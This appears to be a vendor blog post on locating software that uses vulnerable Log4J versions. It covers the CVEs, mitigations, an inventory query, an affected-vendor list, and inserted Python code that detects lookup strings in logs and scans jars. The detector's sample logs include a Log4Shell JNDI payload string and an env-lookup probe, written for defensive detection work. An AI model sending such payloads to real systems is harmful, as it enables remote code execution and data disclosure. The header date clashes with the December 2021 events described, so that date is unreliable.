Finding applications that use Log4J

by Pearce Barry and HD Moore

Last updated on January 17, 2021 at 16:00 CST (-0600)

Rumble can help you build an up-to-date asset inventory and search for assets that may be affected by the recent spate of Log4J vulnerabilities (e.g. Log4Shell). You can then share the results with your security team for investigation and mitigation.

Rumble is not a vulnerability scanner. At this stage, vulnerability scanners have limited coverage, and are unable to detect all variants with a normal scan. Updates will eventually be available, but until then, Rumble’s asset inventory can help you get ahead of the issue.

Log4j vulnerabilities

Internet discussion was abuzz on December 9th about a 0-day vulnerability that can yield remote code execution (RCE) in Apache’s popular Log4J logging library for Java. This particular vulnerability — tracked as CVE-2021-44228 with the maximum “critical” CVSS score of 10 — resides in Log4J’s lookup capability, combined with JNDI (Java Naming and Directory Interface). This issue is widespread because many developers were unaware that Log4J was dangerous to use with unfiltered input.

The most significant impact is that an attacker can cause a string to reach the logger that, when processed by Log4J, executes arbitrary code. The first examples of this used the ${jndi:ldap} path, which could lead to arbitrary code being loaded from a remote URL. This path is partially mitigated by the use of newer Java runtimes that block the URL-based class loader by default. Unfortunately, a modern version of Java may not be enough to prevent exploitation, as the application itself may expose classes that can be used to run arbitrary code.
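The practical defensive question the paragraph above raises is how to spot such strings once they have landed in logs or request captures. The following detector is an added example (not code from the post or from Rumble): it walks constructed sample access-log lines, URL-decodes each one, extracts every `${...` lookup prefix that Log4J would try to resolve, and rates the line by what that lookup could do (JNDI resolution, environment or system-property disclosure, or merely unexpected lookup syntax worth a review). The log lines, the IP addresses and the severity labels are all constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the post). The first two
# carry Log4J lookup expressions in attacker-controlled fields; the third is
# benign; the fourth uses URL-encoded braces that only show up after decoding.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:15:22 +0000] "GET /login?user=${env:HOSTNAME} '
    'HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.2 - - [10/Dec/2021:03:17:40 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0"',
    '10.0.0.2 - - [10/Dec/2021:03:18:13 +0000] "POST /api/price?tpl=$%7Btotal%7D '
    'HTTP/1.1" 200 30 "-" "Mozilla/5.0"',
]

LOOKUP_START = re.compile(r"\$\{")

# Lookup prefixes that Log4J resolves against the running process; when they
# arrive in an untrusted field they can disclose environment variables and
# system configuration to whoever can read the rendered log.
DISCLOSURE_PREFIXES = {"env", "sys", "java", "ctx", "main", "bundle"}


def extract_lookups(text):
    """Return the prefix of every '${...' expression in text, lower-cased.

    The prefix is the text between '${' and the first ':' or '}'. If another
    '${' opens inside that span the prefix is reported as 'nested', so that
    unusual use of the lookup syntax is surfaced instead of ignored.
    """
    prefixes = []
    for match in LOOKUP_START.finditer(text):
        rest = text[match.end():]
        end = len(rest)
        for i, ch in enumerate(rest):
            if ch in ":}":
                end = i
                break
        prefix = rest[:end]
        prefixes.append("nested" if "${" in prefix else prefix.strip().lower())
    return prefixes


def classify_line(line):
    """Rate one log line by the lookups it would hand to Log4J."""
    lookups = extract_lookups(unquote(line))  # access logs store '{' as %7B
    if not lookups:
        severity = "none"
    elif "jndi" in lookups:
        severity = "critical"  # the CVE-2021-44228 / CVE-2021-45046 shape
    elif DISCLOSURE_PREFIXES & set(lookups):
        severity = "high"      # environment / system configuration disclosure
    else:
        severity = "medium"    # lookup syntax in untrusted input: review it
    return {"severity": severity, "lookups": lookups}


def scan_log(lines):
    """Return (line_number, severity, lookups) for every line worth a look."""
    findings = []
    for number, line in enumerate(lines, start=1):
        result = classify_line(line)
        if result["severity"] != "none":
            findings.append((number, result["severity"], result["lookups"]))
    return findings


if __name__ == "__main__":
    for number, severity, lookups in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {severity:8} lookups={lookups}")
```

Decoding before matching matters: web servers typically store request lines percent-encoded, so a detector that only greps for the literal `${jndi:` string in the raw log file misses lines that Log4J itself would have resolved after the application decoded them. The "medium" bucket is deliberate; any lookup syntax arriving from the network is unexpected and deserves a look even when the prefix is harmless.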

While Apache released fixes for CVE-2021-44228 in Log4J version 2.15.0, it was discovered these fixes were “incomplete in certain non-default configurations”, allowing for exploitation in certain circumstances (tracked as CVE-2021-45046, with a “critical” CVSS score of 9.0), leading to a Log4J 2.16.0 release to address CVE-2021-45046.

Following that release, a new vulnerability was raised which can yield a denial-of-service attack via infinite recursion. Tracked as CVE-2021-45105 (and with a “high” CVSS score of 7.5), this vulnerability appeared to affect Log4J versions 2.8 through the most recent 2.16.0 release, and was fixed in versions 2.17.0 (for Java 8) and 2.12.3 (for Java 7).

Then on December 28th, security researchers at Checkmarx published findings of another RCE present in Log4J 2.17.0, one which requires that the attacker has permission to update the logging configuration. Tracked as CVE-2021-44832 (and with a “medium” CVSS score of 6.6), Apache released a fix for this latest vulnerability in Log4J versions 2.17.1 (for Java 8 and later), 2.12.4 (for Java 7), and 2.3.2 (for Java 6).

The broad popularity of Log4J—coupled with the relative ease of exploiting this vulnerability—creates potential conditions for far-reaching exploitation (similar to Shellshock).

Google’s security team have scanned the contents of Maven Central and found over 35,000 affected packages, amounting to over 8% of those in the repository. Any application making use of the affected packages as dependencies may be vulnerable.

Affected applications include Elastic Search, Elastic LogStash, GrayLog2, Minecraft (client and server), Neo4J, many Apache projects (Druid, Dubbo, Flink, Flume, Hadoop, Kafka, Solr, Spark, Struts, Tapestry, Wicket), many VMware products (Horizon, vCenter, vRealize, HCX, NSX-T, UAG, Tanzu), Grails, and dozens if not hundreds of others. Log4J versions since 2.0 are reported to contain this vulnerability, which was originally disclosed to Apache several weeks ago by the security team at Alibaba Cloud.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently created a repo for tracking products/applications affected by Log4Shell, which will likely become the most reliable, long-term source-of-truth. We will continue to update this blog post while CISA builds out their list.

Note: Rumble components (cloud platform, self-hosted, explorer, and CLI scanner) are not affected by this issue.

Mitigations

Patches were made available to prevent code execution in Log4J version 2.15.0, but these patches did not disable inline message lookup, which can expose things like environment variables and system configuration settings to an attacker that can observe the generated logs. Additional patches were made available in Log4J version 2.16.0 to disable JNDI lookups by default, limit them to certain protocols, and allow only localhost by default. Further patches were made in Log4J version 2.17.0 to protect from uncontrolled recursion via self-referential lookups, along with additional patches in Log4J version 2.17.1 limiting JNDI data source names to the java protocol.

For mitigations that folks can take immediately, Apache has offered some guidance.

Note: Initially it was thought that the problem could be mitigated by setting log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS. Apache have now clarified that those mitigation strategies are insufficient.

Mitigating these issues requires one of the following actions:

  • Upgrading to a fixed release: Log4J 2.17.1 (for Java 8 and later), 2.12.4 (for Java 7), or 2.3.2 (for Java 6).
  • Removing the JndiLookup class from the classpath:

    $ zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

  • Overriding the org.apache.logging.log4j.core.lookup.JndiLookup class by making appropriate changes to your classloader configuration.

It is worth noting that an updated version of the Java runtime is not a sufficient mitigation. Newer versions of Java block the URL class loader by default, but can still be abused to leak secrets from the environment, and deserialization attacks may still succeed using classes already loaded by the process.
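Because a fleet can contain a mix of upgraded jars, jars with JndiLookup.class stripped by the zip command above, and untouched ones, an inventory check needs to tell those three states apart rather than just grep for "log4j". The scanner below is an added example (not code from the post, from Rumble, or from Apache): it opens each jar/war/ear as a zip, descends into jars nested under WEB-INF/lib or similar, reads the log4j-core version from the Maven pom.properties (falling back to the file name), checks whether JndiLookup.class is still present, and classifies the result against the fixed versions listed earlier in the post (2.17.1, 2.12.4, 2.3.2). The `make_sample_archive` helper builds a constructed, log4j-core-shaped jar in memory so the example runs offline; the status strings and the helper's contents are assumptions of this example, not real artifacts.

```python
import io
import pathlib
import re
import sys
import zipfile

# Paths inside a log4j-core jar that identify the artifact and the class the
# zip(1) mitigation removes.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_NAME = re.compile(r"\.(jar|war|ear|zip)$", re.IGNORECASE)
VERSION_IN_NAME = re.compile(r"log4j-core-(\d+(?:\.\d+)*)\.jar$", re.IGNORECASE)

# Fixed releases per Java branch as given in the post: 2.17.1 (Java 8+),
# 2.12.4 (Java 7) and 2.3.2 (Java 6). Each entry is (first fixed, branch end).
FIXED_RANGES = [((2, 17, 1), None), ((2, 12, 4), (2, 13, 0)), ((2, 3, 2), (2, 4, 0))]


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); trailing qualifiers such as '-rc1' are dropped."""
    parts = []
    for piece in text.split("."):
        digits = re.match(r"\d+", piece)
        if not digits:
            break
        parts.append(int(digits.group()))
    return tuple((parts + [0, 0, 0])[:3])


def is_fixed(version):
    return any(version >= low and (high is None or version < high)
               for low, high in FIXED_RANGES)


def assess(version, has_jndi_class):
    """Map (version string, JndiLookup present?) to an inventory status."""
    if version is None:
        return "unknown"
    if is_fixed(parse_version(version)):
        return "patched"
    if not has_jndi_class:
        # Class removed as in the zip(1) mitigation: the JNDI RCE path is gone,
        # but the release itself is still below a fully fixed version.
        return "mitigated-jndilookup-removed"
    return "vulnerable"  # includes 2.16.0, which still needs 2.17.x for CVE-2021-45105


def read_version(zf, archive_name):
    if POM_PROPS in zf.namelist():
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    in_name = VERSION_IN_NAME.search(archive_name)
    return in_name.group(1) if in_name else None


def scan_archive(data, name="archive"):
    """Scan an archive given as bytes; descends into jars nested in wars/ears."""
    results = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if POM_PROPS in names or JNDI_LOOKUP in names:
            version = read_version(zf, name)
            results.append((name, version, assess(version, JNDI_LOOKUP in names)))
        for entry in names:
            if ARCHIVE_NAME.search(entry):
                try:
                    results.extend(scan_archive(zf.read(entry), f"{name}!{entry}"))
                except zipfile.BadZipFile:
                    continue
    return results


def scan_directory(root):
    results = []
    for path in pathlib.Path(root).rglob("*"):
        if path.is_file() and ARCHIVE_NAME.search(path.name):
            try:
                results.extend(scan_archive(path.read_bytes(), str(path)))
            except zipfile.BadZipFile:
                continue
    return results


def make_sample_archive(version, include_jndi_class=True, wrap_in_war=False):
    """Build a constructed, minimal log4j-core-shaped jar in memory (not a real artifact)."""
    jar = io.BytesIO()
    with zipfile.ZipFile(jar, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_class:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    if not wrap_in_war:
        return jar.getvalue()
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr(f"WEB-INF/lib/log4j-core-{version}.jar", jar.getvalue())
    return war.getvalue()


if __name__ == "__main__":
    for name, version, status in scan_directory(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{status:30} {version or '?':8} {name}")
```

Run it as `python scan_log4j.py /opt/app` to list every log4j-core found on disk with its status. The nested-archive descent is the part worth keeping: a large share of Log4J copies live inside wars and ears rather than as loose jars, and a file-name search on the host never sees them. Note that the script inspects files only; it cannot see a JndiLookup class that was overridden through classloader configuration, nor a jar that is only present inside a running container image you have not exported.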

How to find applications that use Log4J with Rumble

Identifying every application, device, and service using the Log4J library is going to be an ongoing effort for security professionals. We will continue updating this post and our pre-built queries as more information becomes available.

The following query can be used to identify applications that are likely to be affected by this issue:

product:atlassian or product:avaya or product:coldfusion or product:coyote or product:cpanel or product:druid or product:"elastic search" or product:"epolicy orchestrator" or product:flink or product:graylog or product:hadoop or product:horizon or product:imc or product:jamf or product:jboss or product:jetty or (product:"kerio connect" and protocol:http) or product:logstash or product:metabase or product:minecraft or product:mongodb or product:neo4j or product:openfire or product:pega or product:recoverpoint or product:resin or product:rundeck or product:symantec or product:sonicwall or product:solarwinds or product:sophos or product:splunk or product:tableau or product:tomcat or product:="ubiquiti unifi" or product:"vmware horizon" or product:"vmware vcenter" or product:"vmware vrealize" or product:"vmware site recovery" or product:vmanage or product:wowza or hw:netapp or hw:imc or hw:"ucs manager" or hw:"crosswork son appliance" or hw:"site recovery manager" or hw:sonicwall or tcp_port:8983 or tcp_port:9092 or tcp_port:7077 or tcp_port:5347 or protocol:cassandra or protocol:elasticsearch
(Screenshot: Finding Log4J applications with Rumble)

As always, any prebuilt queries we create are available from our Queries Library. Check out the library for other useful inventory queries. Self-hosted customers may copy the query above, or use the Export System Queries option to download an importable query set from the cloud console.

Affected products and services

ABB

Adobe

Akamai

Amazon

Apache

APC

Apereo

  • CAS — Versions affected: 6.3.X & 6.4.X
  • Opencast — Versions affected: < 9.10, < 10.6

Appeon

  • PowerBuilder — Versions affected: Appeon PowerBuilder 2017-2021 regardless of product edition

Aptible

  • Aptible — Versions affected: ElasticSearch 5.X

Arista

CloudVision

Cognitive Wi-Fi

DANZ Monitoring Fabric

Ascertia

Atlassian

  • Atlassian Products — Self-hosted if configured with log4j.
  • Bamboo — Self-hosted if configured with log4j.
  • Confluence — Self-hosted if configured with log4j.
  • Crowd — Self-hosted if configured with log4j.
  • Crucible — Self-hosted if configured with log4j.
  • Fisheye — Self-hosted if configured with log4j.
  • Jira — Self-hosted if configured with log4j.

Avaya

The current list can be found in the advisory. Some products are still under investigation.

BeyondTrust

BMC Software

The current list can be found in the advisory.

  • Bladelogic Database Automation
  • BMC AMI Ops Common Rest API (CRA)
  • BMC AMI Ops Infrastructure (MVI)
  • BMC AMI Ops Insight
  • BMC AMI Ops UI
  • BMC Client Management
  • BMC Discovery
  • BMC Helix Continuous Optimization
  • BMC License Usage Collection Utility
  • CMDB
  • Control-M
  • Helix Data Manager
  • MainView Middleware Monitor
  • Remedy Smart Reporting
  • Sentry Storage All-in-One ETL
  • Sentry Storage Analyzer KM
  • Sybase KM
  • TrueSight App Visibility Manager
  • TrueSight Automation Console
  • TrueSight Automation for Networks
  • TrueSight Automation for Servers
  • TrueSight Infrastructure Management
  • TrueSight IT Data Analytics
  • TrueSight Operations Management
  • TrueSight Smart Reporting
  • TSOM Smart Reporting

Brainworks

  • Kerio Connect — Versions affected: < 9.4 (CVE-2021-44228)

Broadcom (CA, Symantec)

The current list can be found in the advisory.

CaseWare

  • Cloud — Versions affected: unknown

CIS-CAT

Cisco

The current list can be found in the advisory. Many other products are still under investigation.

Cisco Cloud Hosted Services

Collaboration and Social Media

Network and Content Security Devices

Network Management and Provisioning

Routing and Switching - Enterprise and Service Provider

Unified Computing

Video, Streaming, TelePresence, and Transcoding Devices

Voice and Unified Communications Devices

Other

Cloudera

Cloudogu

Commvault

Confluent

Decos

Dell

EMC

Other

Eaton

Elastic

Elastic has confirmed the vulnerability, but believes their mitigations make it difficult to exploit.

EVL Labs

  • JGAAP — Versions affected: < 8.0.2

Ewon

  • eCatcher — Versions affected: < 6.7.8

ExtraHop

  • Reveal(x) — Versions affected: <=8.4.6, <=8.5.3, <=8.6.4

F-Secure

F5

  • Traffix SDC — Versions affected: 5.2.0 CF1 and 5.1.0 CF-30 through 5.1.0 CF-33. Other F5 products themselves are not vulnerable; F5 published guidance on mitigating through BIG-IP ASM/Advanced WAF and NGINX App Protect.

Filecloud

  • Filecloud — FileCloud uses Apache Solr which in turn uses the log4j library.

ForgeRock

Fortinet

GitHub

Google Cloud

See Google Cloud Log4j security advisory.

Gradle

GuardedBox

HCL

See the KB entries matching CVE-2021-44228 for additional details.

HPE

Huawei

IBM

Analytics

Data Management

Spectrum

Sterling

WebSphere

Other

Informatica

Informatica state that their cloud remediation is complete, and have an advisory listing vulnerable on-premises products.

Intel

Intland

  • codebeamer — Versions affected: <= 20.11-SP11, <= 21.09-SP3

Ivanti

  • Avalanche — Versions affected: 6.3.0, 6.3.1, 6.3.2, 6.3.3

Juniper

Cloud Services

Paragon Automation

Security

Other

Kronos

Lenovo

Networking Switches

Software

Storage

ThinkAgile

ThinkStation

ThinkSystem

Lightbend

LOGalyze

McAfee

Microfocus

CyberRes

Microsoft

Mimecast

  • Mimecast — Affected services have been patched.

MobileIron

Mulesoft

NetApp

New Relic

Nutanix

  • AOS STS — Affected, patched in v6.0.2.4
  • File Analytics — Affected versions: 2.1.x, 2.2.x, 3.0+. Mitigation steps available for 2.1.x, 2.2.x, download available in 3.0.1.
  • Karbon — All versions affected, mitigation steps available.
  • Mine — All versions affected, mitigation steps available.
  • Objects — All versions affected, mitigation steps available.
  • SaaS-based Products — Most affected products have been patched, WAF mitigations in place.
  • Witness VM — All versions affected, mitigation steps available.

Okta

OneSpan

Digipass authentication products

On-premises server products

Oracle

  • Enterprise Manager — Affected versions: 13.3.2, 13.4, & 13.5. Note that Oracle has currently restricted access to vulnerable product information; this information is taken from the CISA list.
  • Exadata — Affected versions: < 21.3.4. Note that Oracle has currently restricted access to vulnerable product information; this information is taken from the CISA list.

OVHcloud

OxygenXML

Palo Alto Networks

Ping Identity

Polycom

PortEx

  • Portex — Versions affected: <3.0.2

Positive Technologies

Progress

PTV Group

Software Solutions for Traffic & Mobility

PureStorage

  • FlashArray — Affected versions: Purity//FA 5.3.x, Purity//FA 6.0.x, Purity//FA 6.1.x, Purity//FA 6.2.x
  • FlashBlade — Affected versions: Purity//FB 3.0.x, Purity//FB 3.1.x, Purity//FB 3.2.x, Purity//FB 3.3.x
  • Portworx — Affected versions: 2.8.0+ with telemetry enabled
  • Pure Cloud Block Store — Affected versions: 6.1.xPAZ, 6.1.xPAWS, 6.2.xPAZ, 6.2.xPAWS
  • Pure VMA Collector — Affected versions: v3.x

Qlik

QMATIC

Rapid7

Real-Time Innovations (RTI)

Red Hat

Cloud Computing

  • OpenShift 3.11 — This issue has been assigned CVE-2021-44228 and rated with a severity impact of Critical.
  • OpenShift 4 — This issue has been assigned CVE-2021-44228 and rated with a severity impact of Critical.
  • OpenShift Logging — This issue has been assigned CVE-2021-44228 and rated with a severity impact of Critical.
  • OpenStack Platform 13 — This issue has been assigned CVE-2021-44228 and rated with a severity impact of Critical.

Cloud Computing/Runtimes

Integration & Automation

Runtimes

Other

Redis

  • Jedis — Versions affected: 3.7.1, 4.0.0-rc2

Revenera

Rockwell Automation

Ruckus

SBT

  • SBT — Versions affected: < 1.5.6

Schneider Electric

  • EASYFIT — Versions affected: Current software and earlier
  • Ecoreal XL — Versions affected: Current software and earlier
  • Eurotherm Data Reviewer — Versions affected: V3.0.2 and prior
  • MSE — Versions affected: Current software and earlier
  • NetBotz750/755 — Versions affected: Software versions 5.0 through 5.3.0
  • NEW630 — Versions affected: Current software and earlier
  • SDK BOM — Versions affected: Current software and earlier
  • SDK-Docgen — Versions affected: Current software and earlier
  • SDK-TNC — Versions affected: Current software and earlier
  • SDK-UMS — Versions affected: Current software and earlier
  • SDK3D2DRenderer — Versions affected: Current software and earlier
  • SDK3D360Widget — Versions affected: Current software and earlier
  • Select and Config DATA — Versions affected: Current software and earlier
  • SNC-API — Versions affected: Current software and earlier
  • SNC-CMM — Versions affected: Current software and earlier
  • SNCSEMTECH — Versions affected: Current software and earlier
  • SPIMV3 — Versions affected: Current software and earlier
  • SWBEditor — Versions affected: Current software and earlier
  • SWBEngine — Versions affected: Current software and earlier

Siemens

SolarWinds

Soliton Systems

SonicWall

  • Email Security — ES 10.0.11 and earlier versions are affected.
  • NSM — Affected.
  • WAF — Version 3.x with Cloud Management enabled is affected.

Splunk

Stardog

  • Stardog — Versions affected: <7.8.1

Stratodesk

  • NoTouch — Versions affected: 4.5.231

SwingSet

  • SwingSet — Versions affected: < 4.0.6

TeamViewer

Tesorion

Tibco

Controllers

Hardware Controllers

TrendMicro

Ubiquiti

USoft

  • USoft — Versions affected: 9.1 (unverified)

VMware

The current list can be found in the advisory.

WatchGuard

Wibu Systems

WitFoo

Zeiss

Zendesk

Other

Potentially affected products

  • Blackberry may be affected.
  • Citrix is still investigating many products.
  • Dell is still investigating.
  • Huawei is still investigating.
  • Kaseya is still investigating.
  • Oracle currently requires a support account to see affected products.
  • TrendMicro is still investigating.
